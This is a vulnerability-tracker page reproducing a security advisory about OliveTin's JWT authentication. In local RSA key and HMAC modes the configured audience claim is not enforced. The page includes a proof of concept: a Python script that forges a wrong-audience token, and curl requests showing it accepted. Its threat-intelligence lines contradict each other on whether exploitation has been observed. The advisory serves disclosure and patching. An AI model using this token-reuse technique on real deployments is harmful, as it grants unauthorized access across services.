Open-Source Security Intelligence

Know every vulnerability
before it knows you.

DevGuard continuously monitors your dependencies and alerts you when CVEs like this one affect your stack — with real-time threat intelligence built for developers.

Search

GHSA-g962-2j28-3cg9

HighCVSS 8.8 / 10
Published Mar 5, 2026·Last modified Mar 23, 2026
Affected Components(0)

No affected components available

Description

Summary

When JWT authentication is configured using either:

  • authJwtPubKeyPath (local RSA public key), or
  • authJwtHmacSecret (HMAC secret),

the configured audience value (authJwtAud) is not enforced during token parsing. As a result, validly signed JWT tokens with an incorrect aud claim are accepted for authentication. This allows authentication using tokens intended for a different audience/service.

Details

Affected Code

File: jwt.go Lines: 51–59, 144–157, 161–168

Current Behavior

Remote JWKS Mode (Correct):

return jwt.Parse(jwtToken, jwksVerifier.Keyfunc, jwt.WithAudience(cfg.AuthJwtAud))

Audience validation is enforced.

Local Public Key Mode (Vulnerable):

return jwt.Parse(jwtString, func(token *jwt.Token) (interface{}, error) { ... })

No jwt.WithAudience() option is provided.

HMAC Mode (Vulnerable):

return jwt.Parse(jwtString, func(token *jwt.Token) (interface{}, error) { ... })

No jwt.WithAudience() option is provided.

Why This Is Vulnerable: authJwtAud is ignored for authJwtPubKeyPath and authJwtHmacSecret modes, so wrong-audience tokens are accepted.

PoC

  1. Configure OliveTin

    Use a minimal config with JWT local key authentication:

    authJwtPubKeyPath: ./public.pem
    authJwtHeader: Authorization
    authJwtClaimUsername: sub
    authJwtAud: expected-audience
    
    authRequireGuestsToLogin: true
    
  2. Generate a Wrong-Audience Token

    python3 - <<EOF
    import jwt, datetime
    
    with open("private.pem") as f:
        key = f.read()
    
    token = jwt.encode(
        {
            "sub": "low",
            "aud": "wrong-audience",   # intentionally wrong
            "exp": datetime.datetime.utcnow() + datetime.timedelta(minutes=30)
        },
        key,
        algorithm="RS256"
    )
    
    print(token)
    EOF
    

    This prints the $WRONG_AUD_TOKEN.

  3. Test Without Token (Baseline)

    curl -i -X POST http://localhost:1337/api/WhoAmI \
      -H 'Content-Type: application/json' \
      -d '{}'
    

    Expected response:

    HTTP/1.1 401 Unauthorized
    
  4. Test With Wrong-Audience Token

    curl -i -X POST http://localhost:1337/api/WhoAmI \
      -H 'Content-Type: application/json' \
      -H "Authorization: Bearer $WRONG_AUD_TOKEN" \
      -d '{}'
    

    Expected response:

    HTTP/1.1 200 OK
    {"authenticatedUser":"low","provider":"jwt","usergroup":"","acls":[],"sid":""}
    

    Authentication succeeds even though the aud claim is incorrect.

Impact

An attacker who possesses a valid JWT signed by the configured key (or HMAC secret) but intended for a different audience can authenticate successfully.

This enables:

  • Cross-service token reuse
  • Authentication using tokens issued for other systems
  • Trust boundary violation in multi-service environments

This is particularly severe when:

  • OliveTin is deployed behind a centralized SSO provider
  • The same signing key is reused across services
  • Audience restrictions are relied upon for service isolation

This does not bypass ACL authorization. It is strictly an authentication validation flaw.

Risk Scores
Base Score
8.8

The vulnerability can be exploited over the network without needing physical access. It is easy for an attacker to exploit this vulnerability. An attacker needs basic access or low-level privileges. No user interaction is needed for the attacker to exploit this vulnerability. The impact is confined to the system where the vulnerability exists. There is a high impact on the confidentiality of the information. There is a high impact on the integrity of the data. There is a high impact on the availability of the system.

Threat Intelligence
8.1

Exploitation activity has been observed. Apply available patches or mitigations urgently.

EPSS
0.30%

The exploit probability is very low. The vulnerability is unlikely to be exploited in the next 30 days.

Exploit
Not available

We did not find any exploit available. Neither in GitHub repositories nor in the Exploit-Database.

Browse More

Scan your project

Continuously monitor your dependencies and get alerted when vulnerabilities like this one affect your stack.

Checkout DevGuard